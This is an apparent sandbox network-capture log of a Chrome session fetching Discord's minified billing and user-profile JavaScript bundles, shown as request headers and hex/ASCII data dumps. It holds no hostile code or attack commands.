                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 7d 2c 72 65 64 69 72 65 63 74 65 64 50 61 79 6d 65 6e 74 53 75 63 63 65 65 64 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 6e 7d 2c 70 61 79 6d 65 6e 74 49 6e 74 65 6e 74 53 75 63 63 65 65 64 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 72 7d 2c 63 61 6e 63 65 6c 53 75 62 73 63 72 69 70 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 6c 7d 2c 64 65 6c 65 74 65 52 65 6e 65 77 61 6c 4d 75 74 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 75 7d 2c 75 70 64 61 74 65 53 75 62 73 63 72 69 70 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 73 7d 2c 72 65 73 75 62 73 63 72 69 62 65 54 6f 53 75 62 73 63
                                                                          Data Ascii: tion(){return $},redirectedPaymentSucceeded:function(){return en},paymentIntentSucceeded:function(){return er},cancelSubscription:function(){return el},deleteRenewalMutation:function(){return eu},updateSubscription:function(){return es},resubscribeToSubsc
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 53 4f 55 52 43 45 28 65 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 2c 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 42 49 4c 4c 49 4e 47 5f 50 41 59 4d 45 4e 54 5f 53 4f 55 52 43 45 5f 52 45 4d 4f 56 45 5f 53 55 43 43 45 53 53 22 2c 69 64 3a 65 7d 29 7d 63 61 74 63 68 28 74 29 7b 6c 65 74 20 65 3d 6e 65 77 20 75 2e 42 69 6c 6c 69 6e 67 45 72 72 6f 72 28 74 29 3b 74 68 72 6f 77 20 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 42 49 4c 4c 49 4e 47 5f 50 41 59 4d 45 4e 54 5f 53 4f 55 52 43 45 5f 52 45 4d 4f 56 45 5f 46 41 49 4c 22 2c 65 72 72 6f 72 3a 65 7d 29 2c 65 7d 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 50 28 65 2c 74 29 7b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70
                                                                          Data Ascii: SOURCE(e),oldFormErrors:!0}),l.default.dispatch({type:"BILLING_PAYMENT_SOURCE_REMOVE_SUCCESS",id:e})}catch(t){let e=new u.BillingError(t);throw l.default.dispatch({type:"BILLING_PAYMENT_SOURCE_REMOVE_FAIL",error:e}),e}}async function P(e,t){l.default.disp
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 45 72 72 6f 72 73 3a 21 30 7d 29 3b 72 65 74 75 72 6e 20 65 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 5f 73 65 63 72 65 74 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 74 72 79 7b 6c 65 74 20 74 3d 61 77 61 69 74 20 6f 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 53 2e 45 6e 64 70 6f 69 6e 74 73 2e 42 49 4c 4c 49 4e 47 5f 50 41 59 4d 45 4e 54 5f 53 4f 55 52 43 45 53 5f 56 41 4c 49 44 41 54 45 5f 42 49 4c 4c 49 4e 47 5f 41 44 44 52 45 53 53 2c 62 6f 64 79 3a 7b 62 69 6c 6c 69 6e 67 5f 61 64 64 72 65 73 73 3a 7b 6e 61 6d 65 3a 65 2e 6e 61 6d 65 2c 6c 69 6e 65 5f 31 3a 65 2e 6c 69 6e 65 31 2c 6c 69 6e 65 5f 32 3a 65 2e 6c 69 6e 65 32 2c 63 69 74 79 3a 65 2e 63 69 74 79 2c 73 74 61 74 65 3a 65 2e 73 74 61 74 65 2c 70 6f 73 74 61 6c 5f
                                                                          Data Ascii: Errors:!0});return e.body.client_secret}async function h(e){try{let t=await o.default.post({url:S.Endpoints.BILLING_PAYMENT_SOURCES_VALIDATE_BILLING_ADDRESS,body:{billing_address:{name:e.name,line_1:e.line1,line_2:e.line2,city:e.city,state:e.state,postal_
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6e 3f 76 6f 69 64 20 30 3a 6e 2e 61 64 79 65 6e 5f 72 65 64 69 72 65 63 74 5f 75 72 6c 29 26 26 28 65 2e 66 69 65 6c 64 73 2e 61 64 79 65 6e 5f 72 65 64 69 72 65 63 74 5f 75 72 6c 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 72 3d 74 2e 62 6f 64 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 61 64 79 65 6e 5f 72 65 64 69 72 65 63 74 5f 75 72 6c 29 7d 28 65 2c 74 29 2c 65 2e 63 6f 64 65 21 3d 3d 73 2e 45 72 72 6f 72 43 6f 64 65 73 2e 43 4f 4e 46 49 52 4d 41 54 49 4f 4e 5f 52 45 51 55 49 52 45 44 26 26 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 42 49 4c 4c 49 4e 47 5f 50 41 59 4d 45 4e 54 5f 53 4f 55 52 43 45 5f 43 52 45 41 54 45 5f 46 41 49 4c 22 2c 65 72 72 6f 72 3a 65
                                                                          Data Ascii: n?void 0:n.adyen_redirect_url)&&(e.fields.adyen_redirect_url=null==t?void 0:null===(r=t.body)||void 0===r?void 0:r.adyen_redirect_url)}(e,t),e.code!==s.ErrorCodes.CONFIRMATION_REQUIRED&&l.default.dispatch({type:"BILLING_PAYMENT_SOURCE_CREATE_FAIL",error:e
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 77 20 42 28 69 29 3b 69 66 28 6e 75 6c 6c 3d 3d 61 29 74 68 72 6f 77 20 42 28 22 74 6f 6b 65 6e 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 77 69 74 68 20 73 75 63 63 65 73 73 66 75 6c 20 73 74 72 69 70 65 20 63 61 6c 6c 22 29 3b 72 65 74 75 72 6e 20 61 2e 69 64 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 74 68 72 6f 77 20 42 28 22 53 74 72 69 70 65 20 6e 6f 74 20 6c 6f 61 64 65 64 22 29 3b 69 66 28 6e 75 6c 6c 3d 3d 74 29 74 68 72 6f 77 20 42 28 22 42 61 6e 6b 20 72 65 71 75 69 72 65 64 20 66 6f 72 20 45 50 53 22 29 3b 6c 65 74 7b 65 6d 61 69 6c 3a 61 2c 6e 61 6d 65 3a 69 2c 6c 69 6e 65 31 3a 6f 2c 6c 69 6e 65 32 3a 75 2c 63 69 74 79 3a 73 2c 73 74 61 74 65 3a 64 2c 70 6f 73 74 61 6c
                                                                          Data Ascii: w B(i);if(null==a)throw B("token not available with successful stripe call");return a.id}async function b(e,t,n,r){if(null==e)throw B("Stripe not loaded");if(null==t)throw B("Bank required for EPS");let{email:a,name:i,line1:o,line2:u,city:s,state:d,postal
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 22 29 3b 72 65 74 75 72 6e 20 55 28 53 2e 50 61 79 6d 65 6e 74 47 61 74 65 77 61 79 73 2e 53 54 52 49 50 45 2c 49 2e 69 64 2c 6e 2c 7b 62 69 6c 6c 69 6e 67 41 64 64 72 65 73 73 54 6f 6b 65 6e 3a 45 2c 61 6e 61 6c 79 74 69 63 73 4c 6f 63 61 74 69 6f 6e 3a 72 2c 62 61 6e 6b 3a 74 7d 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 74 68 72 6f 77 20 42 28 22 53 74 72 69 70 65 20 6e 6f 74 20 6c 6f 61 64 65 64 22 29 3b 6c 65 74 7b 65 6d 61 69 6c 3a 61 2c 6e 61 6d 65 3a 69 2c 6c 69 6e 65 31 3a 6f 2c 6c 69 6e 65 32 3a 75 2c 63 69 74 79 3a 73 2c 73 74 61 74 65 3a 64 2c 70 6f 73 74 61 6c 43 6f 64 65 3a 63 2c 63 6f 75 6e 74 72 79 3a 5f 7d 3d 6e 3b 69 66 28 6e 75 6c 6c 3d 3d 61 29 74 68 72 6f 77 20
                                                                          Data Ascii: ");return U(S.PaymentGateways.STRIPE,I.id,n,{billingAddressToken:E,analyticsLocation:r,bank:t})}async function g(e,t,n,r){if(null==e)throw B("Stripe not loaded");let{email:a,name:i,line1:o,line2:u,city:s,state:d,postalCode:c,country:_}=n;if(null==a)throw
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 2c 6e 2c 72 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 74 29 74 68 72 6f 77 20 42 28 22 53 74 72 69 70 65 20 6f 72 20 74 6f 6b 65 6e 20 6e 6f 74 20 6c 6f 61 64 65 64 22 29 3b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 42 49 4c 4c 49 4e 47 5f 50 41 59 4d 45 4e 54 5f 53 4f 55 52 43 45 5f 43 52 45 41 54 45 5f 53 54 41 52 54 22 7d 29 3b 6c 65 74 20 61 3d 6e 75 6c 6c 3b 74 72 79 7b 61 3d 61 77 61 69 74 20 43 28 29 7d 63 61 74 63 68 28 65 29 7b 74 68 72 6f 77 20 42 28 65 29 7d 6c 65 74 7b 6e 61 6d 65 3a 6f 2c 6c 69 6e 65 31 3a 75 2c 6c 69 6e 65 32 3a 73 2c 63 69 74 79 3a 64 2c 73 74 61 74 65 3a 63 2c 70 6f 73 74 61 6c 43 6f 64 65 3a 5f 2c 63 6f 75 6e 74 72 79 3a 45 7d 3d 6e 2c 49 3d 61 77 61 69 74 20 68 28 6e
                                                                          Data Ascii: ,n,r){if(null==e||null==t)throw B("Stripe or token not loaded");l.default.dispatch({type:"BILLING_PAYMENT_SOURCE_CREATE_START"});let a=null;try{a=await C()}catch(e){throw B(e)}let{name:o,line1:u,line2:s,city:d,state:c,postalCode:_,country:E}=n,I=await h(n
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 79 3a 5f 7d 2c 6e 61 6d 65 3a 6f 7d 7d 29 3b 69 66 28 6e 75 6c 6c 21 3d 70 29 74 68 72 6f 77 20 42 28 70 29 3b 69 66 28 6e 75 6c 6c 3d 3d 49 29 74 68 72 6f 77 20 42 28 22 73 74 72 69 70 65 50 61 79 6d 65 6e 74 4d 65 74 68 6f 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 77 69 74 68 20 73 75 63 63 65 73 73 66 75 6c 20 73 74 72 69 70 65 20 63 61 6c 6c 22 29 3b 72 65 74 75 72 6e 20 55 28 53 2e 50 61 79 6d 65 6e 74 47 61 74 65 77 61 79 73 2e 53 54 52 49 50 45 2c 49 2e 69 64 2c 74 2c 7b 62 69 6c 6c 69 6e 67 41 64 64 72 65 73 73 54 6f 6b 65 6e 3a 61 2c 61 6e 61 6c 79 74 69 63 73 4c 6f 63 61 74 69 6f 6e 3a 72 7d 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6b 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 72 3d 61 77 61 69 74 20 68 28 65 29 2c 61 3d 7b 74 79 70 65
                                                                          Data Ascii: y:_},name:o}});if(null!=p)throw B(p);if(null==I)throw B("stripePaymentMethod not available with successful stripe call");return U(S.PaymentGateways.STRIPE,I.id,t,{billingAddressToken:a,analyticsLocation:r})}async function k(e,t,n){let r=await h(e),a={type


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          287192.168.2.550022162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:15 UTC866OUTGET /assets/49191.d845556dff27841ecd1e.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Z.MTrWXYna45fXtGvhRBk.Y5ys9ax0.AcL1Lr.Qg04Y-1702226714835-0-604800000
                                                                          2023-12-10 16:45:15 UTC1126INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 37 34 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 62 35 63 35 66 33 31 64 32 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:15 GMTContent-Type: application/javascriptContent-Length: 12747Connection: closeCF-Ray: 8336f50b5c5f31d2-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:15 UTC243INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 39 31 39 31 22 5d 2c 7b 34 36 32 32 37 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 69 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 69 29 2c 6c 2e 64 28 69 2c 7b 75 73 65 43 6f 6c 6f 72 53 74 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 2c 6d 61 79 62 65 46 65 74 63 68 43 6f 6c 6f 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 2c 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 2c 75 73 65 41 76 61 74 61 72 43
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["49191"],{462274:function(e,i,l){"use strict";l.r(i),l.d(i,{useColorStore:function(){return c},maybeFetchColors:function(){return f},default:function(){return p},useAvatarC
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6f 6c 6f 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 7d 29 2c 6c 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 74 3d 6c 28 22 38 38 34 36 39 31 22 29 2c 6e 3d 6c 28 22 36 35 36 32 38 30 22 29 2c 72 3d 6c 2e 6e 28 6e 29 2c 75 3d 6c 28 22 33 30 38 35 30 33 22 29 2c 6f 3d 6c 28 22 34 34 36 36 37 34 22 29 2c 64 3d 6c 28 22 32 30 36 32 33 30 22 29 2c 73 3d 6c 28 22 32 38 34 36 37 39 22 29 2c 61 3d 6c 28 22 31 30 33 36 30 33 22 29 3b 6c 65 74 20 63 3d 28 30 2c 75 2e 64 65 66 61 75 6c 74 29 28 28 29 3d 3e 28 7b 70 61 6c 65 74 74 65 3a 7b 7d 2c 66 65 74 63 68 69 6e 67 3a 7b 7d 7d 29 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 6e 75 6c 6c 3d 3d 63 2e 67 65 74 53 74 61 74 65 28 29 2e 70 61 6c 65 74 74 65 5b 65 5d 26 26
                                                                          Data Ascii: olors:function(){return _}}),l("222007");var t=l("884691"),n=l("656280"),r=l.n(n),u=l("308503"),o=l("446674"),d=l("206230"),s=l("284679"),a=l("103603");let c=(0,u.default)(()=>({palette:{},fetching:{}}));async function f(e){null==c.getState().palette[e]&&
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 74 20 70 72 65 6d 69 75 6d 53 69 6e 63 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 75 73 65 72 50 72 6f 66 69 6c 65 2e 70 72 65 6d 69 75 6d 53 69 6e 63 65 7d 67 65 74 20 70 72 65 6d 69 75 6d 47 75 69 6c 64 53 69 6e 63 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 75 73 65 72 50 72 6f 66 69 6c 65 2e 70 72 65 6d 69 75 6d 47 75 69 6c 64 53 69 6e 63 65 7d 67 65 74 20 70 72 65 6d 69 75 6d 54 79 70 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 75 73 65 72 50 72 6f 66 69 6c 65 2e 70 72 65 6d 69 75 6d 54 79 70 65 7d 67 65 74 20 70 72 69 6d 61 72 79 43 6f 6c 6f 72 28 29 7b 76 61 72 20 65 2c 69 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 69 3d 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 68 69 73 2e 74 68 65 6d 65 43 6f 6c 6f 72 73 29 7c 7c 76 6f 69 64 20
                                                                          Data Ascii: t premiumSince(){return this._userProfile.premiumSince}get premiumGuildSince(){return this._userProfile.premiumGuildSince}get premiumType(){return this._userProfile.premiumType}get primaryColor(){var e,i;return null!==(i=null===(e=this.themeColors)||void
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6f 75 6e 73 29 21 3d 6e 75 6c 6c 26 26 28 6e 75 6c 6c 3d 3d 3d 28 69 3d 74 68 69 73 2e 5f 67 75 69 6c 64 4d 65 6d 62 65 72 50 72 6f 66 69 6c 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 70 72 6f 6e 6f 75 6e 73 29 21 3d 3d 22 22 7d 67 65 74 42 61 6e 6e 65 72 55 52 4c 28 65 29 7b 6c 65 74 7b 63 61 6e 41 6e 69 6d 61 74 65 3a 69 2c 73 69 7a 65 3a 6c 7d 3d 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 68 69 73 2e 67 75 69 6c 64 49 64 26 26 74 68 69 73 2e 69 73 55 73 69 6e 67 47 75 69 6c 64 4d 65 6d 62 65 72 42 61 6e 6e 65 72 28 29 3f 28 30 2c 72 2e 67 65 74 47 75 69 6c 64 4d 65 6d 62 65 72 42 61 6e 6e 65 72 55 52 4c 29 28 7b 69 64 3a 74 68 69 73 2e 75 73 65 72 49 64 2c 67 75 69 6c 64 49 64 3a 74 68 69 73 2e 67 75 69 6c 64 49 64 2c
                                                                          Data Ascii: ouns)!=null&&(null===(i=this._guildMemberProfile)||void 0===i?void 0:i.pronouns)!==""}getBannerURL(e){let{canAnimate:i,size:l}=e;return null!=this.guildId&&this.isUsingGuildMemberBanner()?(0,r.getGuildMemberBannerURL)({id:this.userId,guildId:this.guildId,
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 65 72 2c 74 68 69 73 2e 62 69 6f 3d 64 28 65 2e 62 69 6f 2c 6e 75 6c 6c 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 62 69 6f 29 2c 74 68 69 73 2e 70 72 6f 6e 6f 75 6e 73 3d 64 28 65 2e 70 72 6f 6e 6f 75 6e 73 2c 6e 75 6c 6c 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 70 72 6f 6e 6f 75 6e 73 29 2c 74 68 69 73 2e 61 63 63 65 6e 74 43 6f 6c 6f 72 3d 65 2e 61 63 63 65 6e 74 43 6f 6c 6f 72 2c 74 68 69 73 2e 74 68 65 6d 65 43 6f 6c 6f 72 73 3d 6e 75 6c 6c 21 3d 3d 28 74 3d 6e 75 6c 6c 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 74 68 65 6d 65 43 6f 6c 6f 72 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 65 2e 74 68 65 6d 65 43 6f 6c 6f 72 73 2c 74 68 69 73 2e 70 6f 70 6f 75 74 41 6e 69 6d 61 74 69 6f 6e 50 61 72 74 69 63 6c 65 54 79 70 65 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d
                                                                          Data Ascii: er,this.bio=d(e.bio,null==i?void 0:i.bio),this.pronouns=d(e.pronouns,null==i?void 0:i.pronouns),this.accentColor=e.accentColor,this.themeColors=null!==(t=null==i?void 0:i.themeColors)&&void 0!==t?t:e.themeColors,this.popoutAnimationParticleType=null!==(n=
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6c 6c 21 3d 65 2e 6d 75 74 75 61 6c 5f 67 75 69 6c 64 73 29 7b 6c 65 74 20 69 3d 7b 7d 3b 65 2e 6d 75 74 75 61 6c 5f 67 75 69 6c 64 73 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 6c 65 74 7b 69 64 3a 6c 2c 6e 69 63 6b 3a 74 7d 3d 65 2c 6e 3d 73 2e 64 65 66 61 75 6c 74 2e 67 65 74 47 75 69 6c 64 28 6c 29 3b 6e 75 6c 6c 21 3d 6e 26 26 28 69 5b 6c 5d 3d 7b 67 75 69 6c 64 3a 6e 2c 6e 69 63 6b 3a 74 7d 29 7d 29 2c 62 5b 65 2e 75 73 65 72 2e 69 64 5d 3d 66 2e 64 65 66 61 75 6c 74 2e 67 65 74 46 6c 61 74 74 65 6e 65 64 47 75 69 6c 64 49 64 73 28 29 2e 66 69 6c 74 65 72 28 65 3d 3e 6e 75 6c 6c 21 3d 69 5b 65 5d 29 2e 6d 61 70 28 65 3d 3e 28 7b 67 75 69 6c 64 3a 69 5b 65 5d 2e 67 75 69 6c 64 2c 6e 69 63 6b 3a 69 5b 65 5d 2e 6e 69 63 6b 7d 29 29 7d 69 66 28 6e 75 6c 6c
                                                                          Data Ascii: ll!=e.mutual_guilds){let i={};e.mutual_guilds.forEach(e=>{let{id:l,nick:t}=e,n=s.default.getGuild(l);null!=n&&(i[l]={guild:n,nick:t})}),b[e.user.id]=f.default.getFlattenedGuildIds().filter(e=>null!=i[e]).map(e=>({guild:i[e].guild,nick:i[e].nick}))}if(null
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6c 61 73 74 46 65 74 63 68 65 64 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 6c 65 67 61 63 79 55 73 65 72 6e 61 6d 65 3a 65 2e 6c 65 67 61 63 79 5f 75 73 65 72 6e 61 6d 65 2c 70 72 6f 66 69 6c 65 46 65 74 63 68 46 61 69 6c 65 64 3a 21 31 2c 61 70 70 6c 69 63 61 74 69 6f 6e 3a 6e 75 6c 6c 21 3d 46 3f 7b 69 64 3a 46 2e 69 64 2c 70 72 69 6d 61 72 79 53 6b 75 49 64 3a 46 2e 70 72 69 6d 61 72 79 5f 73 6b 75 5f 69 64 2c 63 75 73 74 6f 6d 49 6e 73 74 61 6c 6c 55 72 6c 3a 46 2e 63 75 73 74 6f 6d 5f 69 6e 73 74 61 6c 6c 5f 75 72 6c 2c 69 6e 73 74 61 6c 6c 50 61 72 61 6d 73 3a 46 2e 69 6e 73 74 61 6c 6c 5f 70 61 72 61 6d 73 2c 66 6c 61 67 73 3a 46 2e 66 6c 61 67 73 2c 70 6f 70 75 6c 61 72 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 49 64 73 3a 46 2e 70 6f 70 75
                                                                          Data Ascii: lastFetched:Date.now(),legacyUsername:e.legacy_username,profileFetchFailed:!1,application:null!=F?{id:F.id,primarySkuId:F.primary_sku_id,customInstallUrl:F.custom_install_url,installParams:F.install_params,flags:F.flags,popularApplicationCommandIds:F.popu
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 4d 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 2e 67 75 69 6c 64 5f 69 64 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 75 73 65 72 49 64 3a 69 2c 67 75 69 6c 64 5f 69 64 3a 6c 2c 61 63 63 65 6e 74 5f 63 6f 6c 6f 72 3a 74 2c 62 61 6e 6e 65 72 3a 6e 2c 62 69 6f 3a 72 2c 70 72 6f 6e 6f 75 6e 73 3a 75 2c 70 6f 70 6f 75 74 5f 61 6e 69 6d 61 74 69 6f 6e 5f 70 61 72 74 69 63 6c 65 5f 74 79 70 65 3a 6f 2c 74 68 65 6d 65 5f 63 6f 6c 6f 72 73 3a 64 2c 70 72 6f 66 69 6c 65 45 66 66 65 63 74 49 44 3a 73 7d 3d 65 3b 69 66 28 6e 75 6c 6c 3d 3d 6c 7c 7c 6e 75 6c 6c 3d 3d 67 5b 69 5d 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 61 3d 67 5b 69 5d 5b 6c 5d 3b 69 66 28 6e 75 6c 6c 3d 3d 61 29 72 65 74 75 72 6e 21 31 3b 67 5b 69 5d 5b
                                                                          Data Ascii: function M(e){return null!=e.guild_id?function(e){let{userId:i,guild_id:l,accent_color:t,banner:n,bio:r,pronouns:u,popout_animation_particle_type:o,theme_colors:d,profileEffectID:s}=e;if(null==l||null==g[i])return!1;let a=g[i][l];if(null==a)return!1;g[i][
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 65 26 26 65 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 6c 65 74 7b 75 73 65 72 49 64 3a 69 2c 70 72 6f 66 69 6c 65 3a 6c 7d 3d 65 3b 5f 5b 69 5d 3d 6c 7d 29 7d 2c 74 68 69 73 2e 72 65 67 69 73 74 65 72 41 63 74 69 6f 6e 48 61 6e 64 6c 65 72 73 28 7b 43 41 43 48 45 5f 4c 4f 41 44 45 44 5f 4c 41 5a 59 3a 74 68 69 73 2e 6c 6f 61 64 43 61 63 68 65 2c 55 53 45 52 5f 50 52 4f 46 49 4c 45 5f 46 45 54 43 48 5f 53 54 41 52 54 3a 79 2c 55 53 45 52 5f 50 52 4f 46 49 4c 45 5f 46 45 54 43 48 5f 46 41 49 4c 55 52 45 3a 41 2c 55 53 45 52 5f 50 52 4f 46 49 4c 45 5f 46 45 54 43 48 5f 53 55 43 43 45 53 53 3a 46 2c 55 53 45 52 5f 50 52 4f 46 49 4c 45 5f 55 50 44 41 54 45 5f 53 55 43 43 45 53 53 3a 4d 2c 55 53 45 52 5f 50 52 4f 46 49 4c 45 5f 41 43 43 45 53 53 49 42 49 4c 49 54
                                                                          Data Ascii: e&&e.forEach(e=>{let{userId:i,profile:l}=e;_[i]=l})},this.registerActionHandlers({CACHE_LOADED_LAZY:this.loadCache,USER_PROFILE_FETCH_START:y,USER_PROFILE_FETCH_FAILURE:A,USER_PROFILE_FETCH_SUCCESS:F,USER_PROFILE_UPDATE_SUCCESS:M,USER_PROFILE_ACCESSIBILIT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          288192.168.2.550023162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:15 UTC866OUTGET /assets/26230.a8a95f983d9bf704aebc.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
